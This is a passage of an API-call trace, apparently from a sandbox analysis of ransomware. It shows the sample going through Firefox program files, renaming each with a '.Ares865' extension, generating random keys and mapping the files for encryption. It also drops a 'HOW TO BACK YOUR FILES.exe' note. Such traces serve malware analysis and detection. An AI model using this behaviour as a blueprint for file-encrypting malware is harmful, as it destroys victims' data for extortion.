lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x25b70, lpName=0x0) returned 0x170 [0127.409] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x25b70) returned 0x420000 [0127.415] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0127.416] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0127.416] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.419] lstrcpyW (in: lpString1=0x2cce44e, lpString2="uninstall" | out: lpString1="uninstall") returned="uninstall" [0127.419] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ae8 [0127.419] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x62) returned 0x2d3040 [0127.419] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7af0 | out: ListHead=0x2e7710, ListEntry=0x2e7af0) returned 0x2e7ad0 [0127.419] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf157600, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf157600, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x9f38e880, ftLastWriteTime.dwHighDateTime=0x1ced1d1, nFileSizeHigh=0x0, nFileSizeLow=0x89, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="update-settings.ini", cAlternateFileName="UPDATE~1.INI")) returned 1 [0127.419] lstrcmpiW (lpString1="update-settings.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0127.419] lstrcmpiW (lpString1="update-settings.ini", lpString2="aoldtz.exe") returned 1 [0127.419] lstrcpyW (in: lpString1=0x2cce44e, lpString2="update-settings.ini" | out: lpString1="update-settings.ini") returned="update-settings.ini" [0127.419] lstrlenW (lpString="update-settings.ini") returned 19 [0127.419] lstrlenW (lpString="Ares865") returned 7 [0127.419] lstrcmpiW (lpString1="ngs.ini", lpString2="Ares865") returned 1 [0127.419] lstrlenW (lpString=".dll") returned 4 [0127.419] lstrcmpiW (lpString1="update-settings.ini", lpString2=".dll") returned 1 [0127.419] lstrlenW (lpString=".lnk") returned 4 [0127.419] lstrcmpiW (lpString1="update-settings.ini", lpString2=".lnk") returned 1 [0127.419] lstrlenW (lpString=".ini") returned 4 [0127.419] lstrcmpiW (lpString1="update-settings.ini", lpString2=".ini") returned 1 [0127.419] lstrlenW (lpString=".sys") returned 4 [0127.419] lstrcmpiW (lpString1="update-settings.ini", lpString2=".sys") returned 1 [0127.419] lstrlenW (lpString="update-settings.ini") returned 19 [0127.420] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini.Ares865") returned 66 [0127.420] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\update-settings.ini"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\update-settings.ini.ares865"), dwFlags=0x1) returned 1 [0127.424] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\update-settings.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0127.424] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=137) returned 1 [0127.424] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0127.425] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0127.425] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.425] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x170 [0127.427] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x190000 [0127.428] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0127.428] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0127.428] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.429] lstrcpyW (in: lpString1=0x2cce44e, lpString2="updater.exe" | out: lpString1="updater.exe") returned="updater.exe" [0127.429] lstrlenW (lpString="updater.exe") returned 11 [0127.429] lstrlenW (lpString="Ares865") returned 7 [0127.429] lstrcmpiW (lpString1="ter.exe", lpString2="Ares865") returned 1 [0127.429] lstrlenW (lpString=".dll") returned 4 [0127.429] lstrcmpiW (lpString1="updater.exe", lpString2=".dll") returned 1 [0127.429] lstrlenW (lpString=".lnk") returned 4 [0127.429] lstrcmpiW (lpString1="updater.exe", lpString2=".lnk") returned 1 [0127.429] lstrlenW (lpString=".ini") returned 4 [0127.429] lstrcmpiW (lpString1="updater.exe", lpString2=".ini") returned 1 [0127.429] lstrlenW (lpString=".sys") returned 4 [0127.429] lstrcmpiW (lpString1="updater.exe", lpString2=".sys") returned 1 [0127.429] lstrlenW (lpString="updater.exe") returned 11 [0127.430] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\updater.exe.Ares865") returned 58 [0127.430] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\updater.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\updater.exe"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\updater.exe.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\updater.exe.ares865"), dwFlags=0x1) returned 1 [0127.432] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\updater.exe.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\updater.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0127.432] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=274032) returned 1 [0127.432] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0127.433] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0127.433] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.433] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x43170, lpName=0x0) returned 0x170 [0127.435] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x43170) returned 0x420000 [0127.449] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0127.450] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0127.450] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.454] lstrcpyW (in: lpString1=0x2cce44e, lpString2="updater.ini" | out: lpString1="updater.ini") returned="updater.ini" [0127.454] lstrlenW (lpString="updater.ini") returned 11 [0127.454] lstrlenW (lpString="Ares865") returned 7 [0127.454] lstrcmpiW (lpString1="ter.ini", lpString2="Ares865") returned 1 [0127.454] lstrlenW (lpString=".dll") returned 4 [0127.454] lstrcmpiW (lpString1="updater.ini", lpString2=".dll") returned 1 [0127.454] lstrlenW (lpString=".lnk") returned 4 [0127.454] lstrcmpiW (lpString1="updater.ini", lpString2=".lnk") returned 1 [0127.454] lstrlenW (lpString=".ini") returned 4 [0127.454] lstrcmpiW (lpString1="updater.ini", lpString2=".ini") returned 1 [0127.454] lstrlenW (lpString=".sys") returned 4 [0127.454] lstrcmpiW (lpString1="updater.ini", lpString2=".sys") returned 1 [0127.454] lstrlenW (lpString="updater.ini") returned 11 [0127.455] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini.Ares865") returned 58 [0127.455] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\updater.ini"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\updater.ini.ares865"), dwFlags=0x1) returned 1 [0127.456] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\updater.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0127.457] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1245) returned 1 [0127.457] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0127.458] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0127.458] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.458] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x170 [0127.459] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x190000 [0127.460] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0127.461] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0127.461] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.461] lstrcpyW (in: lpString1=0x2cce44e, lpString2="webapp-uninstaller.exe" | out: lpString1="webapp-uninstaller.exe") returned="webapp-uninstaller.exe" [0127.461] lstrlenW (lpString="webapp-uninstaller.exe") returned 22 [0127.461] lstrlenW (lpString="Ares865") returned 7 [0127.461] lstrcmpiW (lpString1="ler.exe", lpString2="Ares865") returned 1 [0127.461] lstrlenW (lpString=".dll") returned 4 [0127.461] lstrcmpiW (lpString1="webapp-uninstaller.exe", lpString2=".dll") returned 1 [0127.461] lstrlenW (lpString=".lnk") returned 4 [0127.461] lstrcmpiW (lpString1="webapp-uninstaller.exe", lpString2=".lnk") returned 1 [0127.461] lstrlenW (lpString=".ini") returned 4 [0127.462] lstrcmpiW (lpString1="webapp-uninstaller.exe", lpString2=".ini") returned 1 [0127.462] lstrlenW (lpString=".sys") returned 4 [0127.462] lstrcmpiW (lpString1="webapp-uninstaller.exe", lpString2=".sys") returned 1 [0127.462] lstrlenW (lpString="webapp-uninstaller.exe") returned 22 [0127.462] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\webapp-uninstaller.exe.Ares865") returned 69 [0127.462] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\webapp-uninstaller.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapp-uninstaller.exe"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\webapp-uninstaller.exe.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapp-uninstaller.exe.ares865"), dwFlags=0x1) returned 1 [0127.464] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\webapp-uninstaller.exe.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapp-uninstaller.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0127.464] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=170960) returned 1 [0127.464] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0127.465] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0127.465] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.465] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x29ed0, lpName=0x0) returned 0x170 [0127.466] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x29ed0) returned 0x420000 [0127.474] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0127.474] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0127.474] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.477] lstrcpyW (in: lpString1=0x2cce44e, lpString2="webapprt" | out: lpString1="webapprt") returned="webapprt" [0127.477] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b08 [0127.477] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x60) returned 0x2f2168 [0127.477] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b10 | out: ListHead=0x2e7710, ListEntry=0x2e7b10) returned 0x2e7af0 [0127.477] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf17d760, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf17d760, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x390e8e80, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x1a670, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="webapprt-stub.exe", cAlternateFileName="WEBAPP~2.EXE")) returned 1 [0127.477] lstrcmpiW (lpString1="webapprt-stub.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0127.477] lstrcmpiW (lpString1="webapprt-stub.exe", lpString2="aoldtz.exe") returned 1 [0127.477] lstrcpyW (in: lpString1=0x2cce44e, lpString2="webapprt-stub.exe" | out: lpString1="webapprt-stub.exe") returned="webapprt-stub.exe" [0127.477] lstrlenW (lpString="webapprt-stub.exe") returned 17 [0127.478] lstrlenW (lpString="Ares865") returned 7 [0127.478] lstrcmpiW (lpString1="tub.exe", lpString2="Ares865") returned 1 [0127.478] lstrlenW (lpString=".dll") returned 4 [0127.478] lstrcmpiW (lpString1="webapprt-stub.exe", lpString2=".dll") returned 1 [0127.478] lstrlenW (lpString=".lnk") returned 4 [0127.478] lstrcmpiW (lpString1="webapprt-stub.exe", lpString2=".lnk") returned 1 [0127.478] lstrlenW (lpString=".ini") returned 4 [0127.478] lstrcmpiW (lpString1="webapprt-stub.exe", lpString2=".ini") returned 1 [0127.478] lstrlenW (lpString=".sys") returned 4 [0127.478] lstrcmpiW (lpString1="webapprt-stub.exe", lpString2=".sys") returned 1 [0127.478] lstrlenW (lpString="webapprt-stub.exe") returned 17 [0127.478] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\webapprt-stub.exe.Ares865") returned 64 [0127.478] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\webapprt-stub.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapprt-stub.exe"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\webapprt-stub.exe.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapprt-stub.exe.ares865"), dwFlags=0x1) returned 1 [0127.480] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\webapprt-stub.exe.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapprt-stub.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0127.480] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=108144) returned 1 [0127.480] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0127.481] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0127.481] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.481] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1a970, lpName=0x0) returned 0x170 [0127.482] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1a970) returned 0x190000 [0127.487] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0127.488] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0127.488] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.490] lstrcpyW (in: lpString1=0x2cce44e, lpString2="xul.dll" | out: lpString1="xul.dll") returned="xul.dll" [0127.490] lstrlenW (lpString="xul.dll") returned 7 [0127.490] lstrlenW (lpString="Ares865") returned 7 [0127.490] lstrlenW (lpString=".dll") returned 4 [0127.490] lstrcmpiW (lpString1="xul.dll", lpString2=".dll") returned 1 [0127.490] lstrlenW (lpString=".lnk") returned 4 [0127.490] lstrcmpiW (lpString1="xul.dll", lpString2=".lnk") returned 1 [0127.490] lstrlenW (lpString=".ini") returned 4 [0127.490] lstrcmpiW (lpString1="xul.dll", lpString2=".ini") returned 1 [0127.490] lstrlenW (lpString=".sys") returned 4 [0127.490] lstrcmpiW (lpString1="xul.dll", lpString2=".sys") returned 1 [0127.490] lstrlenW (lpString="xul.dll") returned 7 [0127.490] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\xul.dll.Ares865") returned 54 [0127.490] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\xul.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\xul.dll"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\xul.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\xul.dll.ares865"), dwFlags=0x1) returned 1 [0127.493] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\xul.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\xul.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0127.493] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=22028400) returned 1 [0127.493] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0127.494] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0127.494] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.494] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1502370, lpName=0x0) returned 0x170 [0127.496] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x1400000, dwNumberOfBytesToMap=0x102370) returned 0x3030000 [0127.814] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0127.815] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0127.815] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.834] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\webapprt", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\webapprt") returned="C:\\Program Files (x86)\\Mozilla Firefox\\webapprt" [0127.834] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\webapprt" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\webapprt") returned="C:\\Program Files (x86)\\Mozilla Firefox\\webapprt" [0127.834] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0127.834] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\webapprt\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapprt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0127.836] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0127.836] GetLastError () returned 0x0 [0127.837] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0127.837] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\webapprt\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf17d760, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x523a39e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x523a39e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0127.837] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0127.837] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0127.837] lstrcpyW (in: lpString1=0x2cce460, lpString2="omni.ja" | out: lpString1="omni.ja") returned="omni.ja" [0127.837] lstrlenW (lpString="omni.ja") returned 7 [0127.837] lstrlenW (lpString="Ares865") returned 7 [0127.837] lstrlenW (lpString=".dll") returned 4 [0127.837] lstrcmpiW (lpString1="omni.ja", lpString2=".dll") returned 1 [0127.837] lstrlenW (lpString=".lnk") returned 4 [0127.837] lstrcmpiW (lpString1="omni.ja", lpString2=".lnk") returned 1 [0127.837] lstrlenW (lpString=".ini") returned 4 [0127.837] lstrcmpiW (lpString1="omni.ja", lpString2=".ini") returned 1 [0127.837] lstrlenW (lpString=".sys") returned 4 [0127.837] lstrcmpiW (lpString1="omni.ja", lpString2=".sys") returned 1 [0127.838] lstrlenW (lpString="omni.ja") returned 7 [0127.838] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\webapprt\\omni.ja.Ares865") returned 63 [0127.838] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\webapprt\\omni.ja" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapprt\\omni.ja"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\webapprt\\omni.ja.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapprt\\omni.ja.ares865"), dwFlags=0x1) returned 1 [0127.839] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\webapprt\\omni.ja.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapprt\\omni.ja.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0127.839] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27127) returned 1 [0127.840] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0127.840] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0127.840] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.841] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6d00, lpName=0x0) returned 0x170 [0127.842] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6d00) returned 0x190000 [0127.844] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0127.845] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0127.845] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.846] lstrcpyW (in: lpString1=0x2cce460, lpString2="webapprt.ini" | out: lpString1="webapprt.ini") returned="webapprt.ini" [0127.846] lstrlenW (lpString="webapprt.ini") returned 12 [0127.846] lstrlenW (lpString="Ares865") returned 7 [0127.846] lstrcmpiW (lpString1="prt.ini", lpString2="Ares865") returned 1 [0127.846] lstrlenW (lpString=".dll") returned 4 [0127.846] lstrcmpiW (lpString1="webapprt.ini", lpString2=".dll") returned 1 [0127.846] lstrlenW (lpString=".lnk") returned 4 [0127.846] lstrcmpiW (lpString1="webapprt.ini", lpString2=".lnk") returned 1 [0127.846] lstrlenW (lpString=".ini") returned 4 [0127.846] lstrcmpiW (lpString1="webapprt.ini", lpString2=".ini") returned 1 [0127.846] lstrlenW (lpString=".sys") returned 4 [0127.846] lstrcmpiW (lpString1="webapprt.ini", lpString2=".sys") returned 1 [0127.846] lstrlenW (lpString="webapprt.ini") returned 12 [0127.847] wsprintfW (in: 